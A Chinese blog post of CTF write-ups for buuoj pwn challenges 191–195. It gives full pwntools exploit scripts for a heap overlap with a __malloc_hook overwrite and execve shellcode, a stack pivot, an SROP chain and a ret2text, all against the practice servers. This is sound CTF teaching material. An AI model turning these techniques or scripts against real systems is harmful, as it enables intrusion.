buuoj Pwn writeup 191-195

最新推荐文章于 2022-07-04 22:57:08 发布
最新推荐文章于 2022-07-04 22:57:08 发布
阅读量537 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/117756320
版权

191 huxiangbei_2019_hacknote

在这里插入图片描述又是他娘的静态连接去符号表。
但是好的是保护啥也没开。

add
在这里插入图片描述结构正常

delete

在这里插入图片描述清理的也是比较干净的。

edit
在这里插入图片描述跟中关村一个漏洞。

因为不像之前的地址啥的在bss上,所以我们这个题不能unlink,我们overlap,然后就会跟上个题差不多了。

from pwn import *

r = remote("node3.buuoj.cn", 26922)
context.log_level = "debug"
context.arch = "amd64"

elf = ELF("./191")
libc = ELF('./64/libc-2.23.so')

bss_addr = 0x6CCB60
malloc_hook = 0x6CB788
main_arene = 0x6CB800
shellcode = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"

menu = "-----------------\n"
def add(size, content):
	r.recvuntil(menu)
	r.sendline('1')
	r.recvuntil("Input the Size:\n")
	r.sendline(str(size))
	r.recvuntil("Input the Note:\n")
	r.send(content)

def delete(index):
	r.recvuntil(menu)
	r.sendline('2')
	r.recvuntil("Input the Index of Note:\n")
	r.sendline(str(index))


def edit(index, content):
	r.recvuntil(menu)
	r.sendline('3')
	r.recvuntil("Input the Index of Note:\n")
	r.sendline(str(index))
	r.recvuntil("Input the Note:\n")
	r.send(content)

add(0x18, 'chunk0\n')
add(0x18, 'chunk1\n')
add(0x38, 'chunk2\n')
add(0x20, 'chunk3\n')
edit(0, 'a'*0x18)
edit(0, 'a'*0x18+'\x61')
delete(2)
delete(1)
payload = 'a'*0x18 + p64(0x41) + p64(malloc_hook-0x10-6) + '\n'
add(0x58, payload)#1
add(0x38, p64(malloc_hook-6) + '\n')#2
payload = 'a'*6 + p64(malloc_hook+8) + shellcode +'\n'
add(0x38, payload)
r.recvuntil(menu)
r.sendline('1')
r.recvuntil("Input the Size:\n")
r.sendline('10')

r.interactive()

192 pwnable_simple_login

在这里插入图片描述Base64Decode函数实现对输入内容进行base64解码,auth函数会生成解码内容的md5哈希值,并且与程序中保存的hash值对比。

有四个字节的溢出,思路是将EBP覆盖成引导ESP指向包含SHELL地址的内存。进一步在ret时控制eip跳转。其实说白了是一个栈迁移。利用的是内外两个函数的leave | ret。

from pwn import *

r = remote('node3.buuoj.cn', 25953)

input_addr = 0x0811EB40
correct_addr = 0x08049284

r.recvuntil(":")
payload = 'a' * 4 + p32(correct_addr) + p32(input_addr)
r.send(payload.encode('base64'))

r.interactive()

193 mrctf2020_spfa

在这里插入图片描述在这里插入图片描述
进来之后有个小菜单。

说半天总体来讲是spfa,也就是

SPFA 算法是 Bellman-Ford算法 的队列优化算法的别称,通常用于求含负权边的单源最短路径,以及判负权环。SPFA 最坏情况下复杂度和朴素 Bellman-Ford 相同,为 O(VE)。

目的是试图修改flag为别的数字。
在这里插入图片描述问题在这里,就是很基础的数组越界。当编辑q[1000]的时候就会修改flag。

所以我们只要构造一个0环就可以解决问题。

194 360chunqiu2017_smallest

在这里插入图片描述
在这里插入图片描述真的短到就一个read的汇编。

思路是啥呢?其实我们发现溢出还是比较大的,又有syscall,我们考虑srop了。
跟我们以前见过的srop不大一样,以前的srop都是说通过能控制rax为15的gadgets,来达到srop的一个效果,但是这里想的是通过read的返回值,它会把返回值默认返回到rax中,从而控制rax,来达到任意系统调用,可以泄露栈地址,用来我们写rop,然后调用signal,进行srop。

两次用模板还做了个栈迁移的目的只不过是为了写入bin_sh字符串。

# -*- coding: utf-8 -*-
from pwn import *

context.log_level = 'debug'
context.arch = "amd64"

#r = remote('node3.buuoj.cn',27325)
r = process("./194")

syscall = 0x4000be
read = 0x4000b0
payload = p64(read) * 3 
r.send(payload)

r.send('\xb3')

leak = u64(r.recv()[0x148:0x150])
print "leak = " + hex(leak)

frame = SigreturnFrame()
frame.rax = constants.SYS_read
frame.rdi = 0
frame.rsi = leak
frame.rdx = 0x400
frame.rsp = leak
frame.rip = syscall

payload2 = p64(read)+ p64(0xdeadbeef)+str(frame)
r.send(payload2)

sigreturn = p64(syscall) + 'b'*7 #从这个地方开始srop部分
r.send(sigreturn)

frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = leak + 0x120
frame.rsi = 0
frame.rdx = 0
frame.rsp = leak
frame.rip = syscall

payload3 = p64(read) + 'a'*8 + str(frame)
payload3 = payload3.ljust(0x120,'\x00') + '/bin/sh\x00'

r.send(payload3)
r.send(sigreturn)

r.interactive()

隔一段时间总会碰到buu环境有问题的题,这个本地随便打,远程就是通不了。网上的其他师傅也说打不通。

195 watevr_2019_voting_machine_1

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
这不是最最最简单的……
ret2text嘛???

这……93分?

from pwn import *

r = remote('node3.buuoj.cn', 29842)

backdoor = 0x400807

payload = 'a' * 10 + p64(backdoor)
r.sendlineafter("Vote: ", payload)

r.interactive()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF:[Black Watch 入群题]PWNwrite up)
qq_44768749的博客
08-23 796
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 409
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 474
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 278
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3195
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Pwn-list-TYctf新生考核
最新发布
03-31
新生考核pwn题目和源码以及部署指南
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 253
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 234
buuctf-pwn 039~046题
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1115
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
buuctf-pwn write-ups (9)
CoLin的pwn小屋
07-04 219
buuctf-pwn 067~072题题解
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 530
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
buuctf [第五空间2019 决赛]PWN5 writeup
yajuanpi4899的博客
01-16 2012
一、题目速阅 拿到题目,进行check 得到信息,可知开启了金丝雀,32位 IDA进行反编译: 题目分析:该题逻辑是将dword_804C044中值与第二次输入的passwd进行校对,如果相等则执行system("/bin/sh"),确认payload目标:使第二次值相等,而可以看到printf中有格式化字符串,根据此构建payload。 二、知识要点 格式化字符串漏洞: 利用常用方式检索字符在栈上偏移量: 如图所示,41414141即AAAA,可以看到距离AAAA偏移10位 可..
PWN系列】 Buucf babyheap_0ctf_2017 Writeup
Vicl1fe的博客
11-27 641
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/luoleqi/p/12349714.html 分析 参考网址说的已经不错了,主要问题出现在fill功能,只要chunk存在,即可写任意长度的字符。 主要还是利用fasbin attack和unsorted的特性(下面会说到)来修改__malloc_hook拿到shell。 这里我来实际走一遍exp的流程,下面的exp我用的是本地的libc。 利用 下面的代码定
[BUUCTF-pwn]——x_ctf_b0verfl0w
Y_peak的博客
03-27 577
[BUUCTF-pwn]——x_ctf_b0verfl0w 很简单的一个ret2libc题型,利用栈溢出,构造循环调用 第一次leek地址,之后就可以构造我们想要的rop链了 exploit from pwn import * from LibcSearcher import * #p = process('./b0verfl0w') p = remote('node3.buuoj.cn',26806) elf = ELF('./b0verfl0w') context.log_level = 'debug
[BUUCTF-pwn]——pwnable_orw   (ORW)
Y_peak的博客
03-16 1158
[BUUCTF-pwn]——pwnable_orw 第一次碰到orw的问题,所谓orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 这个时候可以通过seccomptools,来查看 注意看到prctl就是将系统调用给你禁止了 exploit from pwn import * context.arch = 'i386' p = remote('node3.buuoj.cn',28626) shellcode = she
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值